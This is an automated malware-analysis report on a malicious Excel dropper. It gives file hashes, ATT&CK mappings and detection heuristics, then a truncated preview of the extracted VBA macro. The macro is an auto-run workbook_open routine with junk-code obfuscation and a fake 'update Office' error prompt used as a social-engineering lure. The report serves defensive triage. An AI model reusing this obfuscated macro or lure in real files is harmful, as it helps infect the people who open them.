Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5385cb28eadd6272…

MALICIOUS

Office (OLE)

Size: 64.0 KB
Created: 2018-06-14 01:22:20
Authoring application: Microsoft Excel
First seen: 2019-01-11
MD5: ef01300c15f0276175a70eafedd2f687
SHA-1: 072294f3a40d4e96833c4ab465a813aa3111a153
SHA-256: 5385cb28eadd6272ed8553c65963a38ab699f274efa3151e89121a910e65ae3d
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The critical ClamAV heuristic indicates the file is a known dropper (Doc.Dropper.Agent-6601592-0). The presence of a Workbook_Open VBA macro, coupled with a CreateObject call, strongly suggests the macro is designed to execute malicious code upon opening. The macro's content, though truncated, includes a message box prompt about updating Office, which is a common social engineering tactic.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6601592-0 (severity: critical; ID: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6601592-0
  • VBA macros detected (severity: medium; 3 related findings; ID: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Workbook_Open macro (severity: high; ID: OLE_VBA_WBOPEN)
    Workbook_Open macro
  • CreateObject call (severity: high; ID: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high; ID: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact (severity: info; ID: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15925 bytes
SHA-256: ef8c7663104594a49e6df352e6bf306b8bea637ffccf36a11750e2f92c25d748
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
OzqB.ETpZX5PqZJVHyJg16kLl
Dim SkOddoNV_jsArR As Byte
If YnKyaut51PNNaZN8bUethd_K6rp4lyaTZet = nFIZ1Wt9NNMxGFFVe7t5h92r_zRAx4x6oTRUKD2IsE6pd Then
Dim vdr_xbtyTnMaTA_sITZQHvwtJZDiJb As Workbook
Dim BKLLDwQs_UJy_mGsr1__5kOLr9q83W As String
End If
Dim WJm2lAMG7PZZNDERuIkZqLdJfZ6_cDESyq7_KG As Byte
If AFej4widUJEYL = fUboJpbTJDMm Then
Dim JEjgEEEmHc5EQpj As Workbook
Dim ADu3Dzi7VAvRsvyBP7Alb3wD_SiW1gh291SFRTiBkGMfR As String
End If
Dim vVzRamHOCGGOp2tOJEya4 As Byte
If S2brs6W9ASnPt = L6rDY3Yk6rJzkaxuYBXDX Then
Dim bcVjqpuPBwb95nwgFo5BRWHP2GdhMk As Workbook
Dim QNKUtaTbrLmT35rzovAMRVcB__TEriJLCYeLvi4TKm As String
End If
Dim qW8cMhAaqf9R4uIOnFNtHAZPbXdCE1pBnY As Byte
If umFkFfpFboCFjalRNM62wo7p_xD7Uzz7md9fG = C9rCAguMUxCZvlbEvk_oZkRaru Then
Dim lyEc_a_IKMLxvGKam9A As Workbook
Dim fhMW11331qapPSO45F2sjTlYM27y7c87RYKK As String
End If
Dim XZNkKgMbtf6dfLOTuOYJ6wH84D6V As Byte
If rcVzGCed2OfCF = Hoq6bQtLmJC__NkQOqGkztOH_UbpuberVDwFaBauJI_ Then
Dim RSyFw3KkgXaOXYgzEyCaInSm6acz As Workbook
Dim MOUYpo6yNMnwh18S5wWq3JT5Gr4m9KJUYUVPBA As String
End If
khVK58Q = MsgBox("Actualizar version de Office", vbCritical, "Error en libreria Microsoft")
Dim isbrj2IO2Rp_rGDv As Byte
If B5YQ8tQyCBRVKcpP3MnMJjbu1yj79c = CPlYSUksk8J2gyz2px9rx3YhtabnZ Then
Dim HITzh9AtvHToIloCRCl48Gu8OnH1Cn As Workbook
Dim QbxyA8yxG3omCnPseaWysa_WUi3yIpFOar As String
End If
Dim I1LPDv_zMETL_2GgLdCLz As Byte
If aYbZD_nZvXJSwF2 = RIRBnkuQAV37 Then
Dim AH4uXe_qasy_vYXaqH2KuONBJAgN As Workbook
Dim pFZDIBlQ1luxvXZhSRNMKRj2cqKu31jW As String
End If
Dim uASQuyswFjDVDYUxoq2uSBVfhibz1W As Byte
If BW1_WFOhbeZDrfdYPy7MIqklrmvsJU26sj = A9LX8qYHXO37n_DIJA Then
Dim IySuMPsSfWElcTFdeL2zNw_RUru As Workbook
Dim vn_J1BhupL8FNW2uQmXlfdg6RInUxAYeetg1V5tauUwR As String
End If
Dim Ntkz5N_rRGaPFC1pV As Byte
If L6nvbjcz_WV27zJqNqhhxZiAqKVQOtRDD_hYGe = vHF_4zmzUQPi1URFhvVm_OLK Then
Dim iN_Qw1Pthr5XawerV1y_Ap27u6fvCdZe5 As Workbook
Dim YouTBdAe_HY3otOnOMYGI2UGfzTdqDPYcfWz6BxTDdosf2Pve As String
End If
Dim WML_vtfRmxJIfx61_YH As Byte
If VYqMX_DoKljnig8RzCSpvzg = RLlJgps1faGYEp9x_rDSoBH Then
Dim kkgdEworVe2X_u3f9btDKZG2lzNS7 As Workbook
Dim qe1OD_i9JmCzsu3LQ8BFK_1487Jbo1NhUun_AG6uSfwyqLbn As String
End If
End Sub


Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "OzqB"
Dim AWYbM5aiAlICElynkc7xb4gROlLzN7nY_rsfELZ1LtIQSQkFTb3rA7rFyELjrkSD7tCV2QgWC_jrtN88A_evC6WC_kp9_ As String
Dim CT_yz5LLbZKqdhTbJz6YERkrfkR1QvAIU8CgFSJTiZxj_C_73gUeWs3tsURNlT4pYBUedvUznkyncAqbjU8tZduk_Qxt_6rMeGJ8qcaEKd1u3MOqm As Integer
Dim F3tB3l5Zlvsq14Pg2_XZmFu3zwCC7nQNGA42vrvNoHRoYCJrF5QxVsN_F1K_i1c7ddhy_WtIRItcx_bvkT6AVb1Xu4u5epowoTJ5cUqsIFeL8uJ As String
Dim pknN8H8WeMMN5M1hSh5ykw_WNXXD12hixtQz_Dbh_WutitREW8l As String

 Function MnT2LLukn6QEyERSWdd8E3KIAOvnQBLudeM_fVTH(aCLcBpYo6WpO3Am3CgBJ4UYZK_bVZ3vyhaixpCMFHGwntSW2a8tAv5CEmvPBMBMCkzpaZyK_S4Avgup2ki5aHtClWcI4uJ)
Dim eXxZRPeZGPct4KkiR6b46mf As Byte
If gj5RHDf_zzhHC5b9EeChSYngL6A2ga9E12OzW8UVkOm3TB = hnz7VW2_KF5W_KCmbW1aQInkkFIp6DvuKIWU Then
Dim Bj_jMvpG492HR7wNB2tW9MTNMKHFTIK5xpk1RO As Workbook
Dim MecfqkM_V8PgrRY9VwNyUBlhwsw7TlU55unN4bfr_MxIzvZ2exSwlb4K2 As String
End If
Dim s7xPotlUk7nI_4PeyGLbr_R4aeQgQbz As Byte
If aV9ri4shDgdIcL = TsYfEmu8XKrn3yHb_CHEKw_Jpk_hH5MzxpEu1_Ky_c7w_5 Then
Dim XkbZAVAfnNycgKyc72yLrVjDzSArzPIukJIgbv As Workbook
Dim xaohElJqP2nbzG_wJA_WjqTQpW_C2VBPAJCWfHO83GBHDWYAox9GfDK As String
End If
   
Dim FEV2rfFy3yVZoD As Byte
If qOBuBdanKMQ7CVCW4t786PHPgZuQHSp6t67g7Vdhta4Hit = csvd4lcpGZ The
... (truncated)